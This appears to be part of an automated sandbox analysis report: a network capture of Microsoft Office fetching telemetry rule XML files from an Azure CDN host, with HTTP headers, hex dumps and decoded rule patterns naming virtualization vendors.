                                                                                                                                                                                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                              Server: cloudflare
                                                                                                                                                                                                                                                              CF-RAY: 8e932aceb8ee41b5-EWR
                                                                                                                                                                                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=1740&min_rtt=1614&rtt_var=696&sent=333&recv=592&lost=0&retrans=0&sent_bytes=2847&recv_bytes=573366&delivery_rate=1809169&cwnd=220&unsent_bytes=0&cid=e1aa399f4b6f5c55&ts=4632&x=0"


                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                              60192.168.2.104977013.107.246.43443
                                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                              2024-11-27 15:31:47 UTC192OUTGET /rules/rule120656v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                                                                                              Accept-Encoding: gzip
                                                                                                                                                                                                                                                              User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                              Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                              2024-11-27 15:31:48 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                              Date: Wed, 27 Nov 2024 15:31:48 GMT
                                                                                                                                                                                                                                                              Content-Type: text/xml
                                                                                                                                                                                                                                                              Content-Length: 477
                                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                                              Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                              Last-Modified: Tue, 09 Apr 2024 00:26:04 GMT
                                                                                                                                                                                                                                                              ETag: "0x8DC582BA48B5BDD"
                                                                                                                                                                                                                                                              x-ms-request-id: f73eacfc-701e-0001-0b91-3fb110000000
                                                                                                                                                                                                                                                              x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                              x-azure-ref: 20241127T153148Z-174f78459685726chC1EWRsnbg0000000x3000000000mzdq
                                                                                                                                                                                                                                                              x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                              X-Cache: TCP_HIT
                                                                                                                                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                                                                                                                                              2024-11-27 15:31:48 UTC477INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 35 36 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 35 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                                                                                                              Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120656" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120655" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                              61192.168.2.104977213.107.246.43443
                                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                              2024-11-27 15:31:48 UTC192OUTGET /rules/rule120657v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                                                                                              Accept-Encoding: gzip
                                                                                                                                                                                                                                                              User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                              Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                              2024-11-27 15:31:48 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                              Date: Wed, 27 Nov 2024 15:31:48 GMT
                                                                                                                                                                                                                                                              Content-Type: text/xml
                                                                                                                                                                                                                                                              Content-Length: 419
                                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                                              Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                              Last-Modified: Tue, 09 Apr 2024 00:25:57 GMT
                                                                                                                                                                                                                                                              ETag: "0x8DC582B9FF95F80"
                                                                                                                                                                                                                                                              x-ms-request-id: 417b9f3b-401e-0029-4091-3f9b43000000
                                                                                                                                                                                                                                                              x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                              x-azure-ref: 20241127T153148Z-174f784596886s2bhC1EWR743w0000000x70000000006e93
                                                                                                                                                                                                                                                              x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                              X-Cache: TCP_HIT
                                                                                                                                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                                                                                                                                              2024-11-27 15:31:48 UTC419INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 35 37 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 35 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 4e 6e 5d 5b 55 75 5d 5b 54 74 5d 5b 41 61 5d 5b 4e 6e 5d 5b 49 69 5d 5b 58 78 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d
                                                                                                                                                                                                                                                              Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120657" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120655" /> <SR T="2" R="([Nn][Uu][Tt][Aa][Nn][Ii][Xx])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O=


                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                              62192.168.2.104977313.107.246.43443
                                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                              2024-11-27 15:31:49 UTC192OUTGET /rules/rule120658v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                                                                                              Accept-Encoding: gzip
                                                                                                                                                                                                                                                              User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                              Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                              2024-11-27 15:31:49 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                              Date: Wed, 27 Nov 2024 15:31:49 GMT
                                                                                                                                                                                                                                                              Content-Type: text/xml
                                                                                                                                                                                                                                                              Content-Length: 472
                                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                                              Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                              Last-Modified: Tue, 09 Apr 2024 00:26:34 GMT
                                                                                                                                                                                                                                                              ETag: "0x8DC582BB650C2EC"
                                                                                                                                                                                                                                                              x-ms-request-id: fcd7fe31-301e-0033-0c91-3ffa9c000000
                                                                                                                                                                                                                                                              x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                              x-azure-ref: 20241127T153149Z-174f7845968cpnpfhC1EWR3afc0000000wvg000000000yuw
                                                                                                                                                                                                                                                              x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                              X-Cache: TCP_HIT
                                                                                                                                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                                                                                                                                              2024-11-27 15:31:49 UTC472INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 35 38 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 35 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                                                                                                              Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120658" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120657" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                              63192.168.2.104977413.107.246.43443
                                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                              2024-11-27 15:31:49 UTC192OUTGET /rules/rule120659v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                                                                                              Accept-Encoding: gzip
                                                                                                                                                                                                                                                              User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                              Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                              2024-11-27 15:31:50 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                              Date: Wed, 27 Nov 2024 15:31:49 GMT
                                                                                                                                                                                                                                                              Content-Type: text/xml
                                                                                                                                                                                                                                                              Content-Length: 468
                                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                                              Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                              Last-Modified: Tue, 09 Apr 2024 00:26:30 GMT
                                                                                                                                                                                                                                                              ETag: "0x8DC582BB3EAF226"
                                                                                                                                                                                                                                                              x-ms-request-id: 3ccb05f8-401e-0016-1b69-3f53e0000000
                                                                                                                                                                                                                                                              x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                              x-azure-ref: 20241127T153149Z-174f78459684bddphC1EWRbht40000000wvg00000000cp6t
                                                                                                                                                                                                                                                              x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                              X-Cache: TCP_HIT
                                                                                                                                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                                                                                                                                              2024-11-27 15:31:50 UTC468INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 35 39 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 35 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 4f 6f 5d 5b 50 70 5d 5b 45 65 5d 5b 4e 6e 5d 5b 53 73 5d 5b 54 74 5d 5b 41 61 5d 5b 43 63 5d 5b 4b 6b 5d 20 5b 46 66 5d 5b 4f 6f 5d 5b 55 75 5d 5b 4e 6e 5d 5b 44 64 5d 5b 41 61 5d 5b 54 74 5d 5b 49 69 5d 5b 4f 6f 5d 5b 4e 6e 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49
                                                                                                                                                                                                                                                              Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120659" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120657" /> <SR T="2" R="([Oo][Pp][Ee][Nn][Ss][Tt][Aa][Cc][Kk] [Ff][Oo][Uu][Nn][Dd][Aa][Tt][Ii][Oo][Nn])"> <S T="1" F="1" M="I


                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                              64192.168.2.104977513.107.246.43443
                                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                              2024-11-27 15:31:50 UTC192OUTGET /rules/rule120660v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                                                                                              Accept-Encoding: gzip
                                                                                                                                                                                                                                                              User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                              Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                              2024-11-27 15:31:50 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                              Date: Wed, 27 Nov 2024 15:31:50 GMT
                                                                                                                                                                                                                                                              Content-Type: text/xml
                                                                                                                                                                                                                                                              Content-Length: 485
                                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                                              Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                              Last-Modified: Tue, 09 Apr 2024 00:26:39 GMT
                                                                                                                                                                                                                                                              ETag: "0x8DC582BB9769355"
                                                                                                                                                                                                                                                              x-ms-request-id: dce0685f-701e-001e-3f83-3ff5e6000000
                                                                                                                                                                                                                                                              x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                              x-azure-ref: 20241127T153150Z-174f7845968cdxdrhC1EWRg0en0000000x400000000084v6
                                                                                                                                                                                                                                                              x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                              X-Cache: TCP_HIT
                                                                                                                                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                                                                                                                                              2024-11-27 15:31:50 UTC485INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 36 30 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 35 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                                                                                                              Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120660" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120659" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                              65192.168.2.104977613.107.246.43443
                                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                              2024-11-27 15:31:50 UTC192OUTGET /rules/rule120661v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                                                                                              Accept-Encoding: gzip
                                                                                                                                                                                                                                                              User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                              Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                              2024-11-27 15:31:51 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                              Date: Wed, 27 Nov 2024 15:31:50 GMT
                                                                                                                                                                                                                                                              Content-Type: text/xml
                                                                                                                                                                                                                                                              Content-Length: 411
                                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                                              Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                              Last-Modified: Tue, 09 Apr 2024 00:25:44 GMT
                                                                                                                                                                                                                                                              ETag: "0x8DC582B989AF051"
                                                                                                                                                                                                                                                              x-ms-request-id: 49dfce9c-f01e-00aa-0974-408521000000
                                                                                                                                                                                                                                                              x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                              x-azure-ref: 20241127T153150Z-174f7845968l4kp6hC1EWRe8840000000x8000000000qhdc
                                                                                                                                                                                                                                                              x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                              X-Cache: TCP_HIT
                                                                                                                                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                                                                                                                                              2024-11-27 15:31:51 UTC411INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 36 31 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 35 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 4f 6f 5d 5b 56 76 5d 5b 49 69 5d 5b 52 72 5d 5b 54 74 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75 65 22 3e 0d
                                                                                                                                                                                                                                                              Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120661" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120659" /> <SR T="2" R="([Oo][Vv][Ii][Rr][Tt])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="true">


                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                              66192.168.2.104976713.107.246.43443
                                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                              2024-11-27 15:31:50 UTC192OUTGET /rules/rule120653v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                                                                                              Accept-Encoding: gzip
                                                                                                                                                                                                                                                              User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                              Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                              2024-11-27 15:31:51 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                              Date: Wed, 27 Nov 2024 15:31:51 GMT
                                                                                                                                                                                                                                                              Content-Type: text/xml
                                                                                                                                                                                                                                                              Content-Length: 419
                                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                                              Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                              Last-Modified: Tue, 09 Apr 2024 00:25:51 GMT
                                                                                                                                                                                                                                                              ETag: "0x8DC582B9C710B28"
                                                                                                                                                                                                                                                              x-ms-request-id: bfa66ccf-601e-0084-085a-406b3f000000
                                                                                                                                                                                                                                                              x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                              x-azure-ref: 20241127T153151Z-174f7845968xlwnmhC1EWR0sv80000000x10000000005btz
                                                                                                                                                                                                                                                              x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                              X-Cache: TCP_HIT
                                                                                                                                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                                                                                                                                              2024-11-27 15:31:51 UTC419INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 35 33 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 35 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 49 69 5d 5b 4e 6e 5d 5b 4e 6e 5d 5b 4f 6f 5d 5b 54 74 5d 5b 45 65 5d 5b 4b 6b 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d
                                                                                                                                                                                                                                                              Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120653" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120651" /> <SR T="2" R="([Ii][Nn][Nn][Oo][Tt][Ee][Kk])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O=


                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                              67192.168.2.104977713.107.246.43443
                                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                              2024-11-27 15:31:51 UTC192OUTGET /rules/rule120662v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                                                                                              Accept-Encoding: gzip
                                                                                                                                                                                                                                                              User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                              Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                              2024-11-27 15:31:52 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                              Date: Wed, 27 Nov 2024 15:31:51 GMT
                                                                                                                                                                                                                                                              Content-Type: text/xml
                                                                                                                                                                                                                                                              Content-Length: 470
                                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                                              Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                              Last-Modified: Tue, 09 Apr 2024 00:26:42 GMT
                                                                                                                                                                                                                                                              ETag: "0x8DC582BBB181F65"
                                                                                                                                                                                                                                                              x-ms-request-id: 6dbf519d-601e-0084-1b91-3f6b3f000000
                                                                                                                                                                                                                                                              x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                              x-azure-ref: 20241127T153151Z-174f7845968kdththC1EWRzvxn00000009e000000000gaen
                                                                                                                                                                                                                                                              x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                              X-Cache: TCP_HIT
                                                                                                                                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                                                                                                                                              2024-11-27 15:31:52 UTC470INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 36 32 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 36 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                                                                                                              Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120662" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120661" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                              68192.168.2.104977813.107.246.43443
                                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                              2024-11-27 15:31:51 UTC192OUTGET /rules/rule120663v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                                                                                              Accept-Encoding: gzip
                                                                                                                                                                                                                                                              User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                              Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                              2024-11-27 15:31:52 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                              Date: Wed, 27 Nov 2024 15:31:52 GMT
                                                                                                                                                                                                                                                              Content-Type: text/xml
                                                                                                                                                                                                                                                              Content-Length: 427
                                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                                              Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                              Last-Modified: Tue, 09 Apr 2024 00:26:32 GMT
                                                                                                                                                                                                                                                              ETag: "0x8DC582BB556A907"
                                                                                                                                                                                                                                                              x-ms-request-id: d6e812ca-001e-008d-1b5a-40d91e000000
                                                                                                                                                                                                                                                              x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                              x-azure-ref: 20241127T153152Z-174f7845968nxc96hC1EWRspw80000000wvg00000000cyzt
                                                                                                                                                                                                                                                              x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                              X-Cache: TCP_HIT
                                                                                                                                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                                                                                                                                              2024-11-27 15:31:52 UTC427INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 36 33 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 36 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 50 70 5d 5b 41 61 5d 5b 52 72 5d 5b 41 61 5d 5b 4c 6c 5d 5b 4c 6c 5d 5b 45 65 5d 5b 4c 6c 5d 5b 53 73 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20
